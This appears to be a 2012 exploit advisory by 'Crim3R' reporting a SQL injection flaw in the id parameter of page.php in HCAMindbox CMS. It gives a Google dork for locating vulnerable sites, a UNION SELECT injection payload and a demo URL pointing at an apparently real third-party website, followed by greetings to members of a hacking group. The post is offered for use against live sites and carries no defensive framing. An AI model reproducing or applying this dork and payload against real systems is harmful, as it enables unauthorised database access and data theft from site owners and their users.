<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
-->
# Exploit Title: HCAMindbox cms Sql Injection Vulnerability
#
# Google Dork: Intext:"powered by Data Management Products"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.hcamindbox.com/
#
# Tested on: all
#
==================================
[+] id parametr in page.php is Vulnerable to sql injection
[+]
target/page.php?id=[id][+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--]
D3m0:
http://www.am800cklw.com/page.php?id=122
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369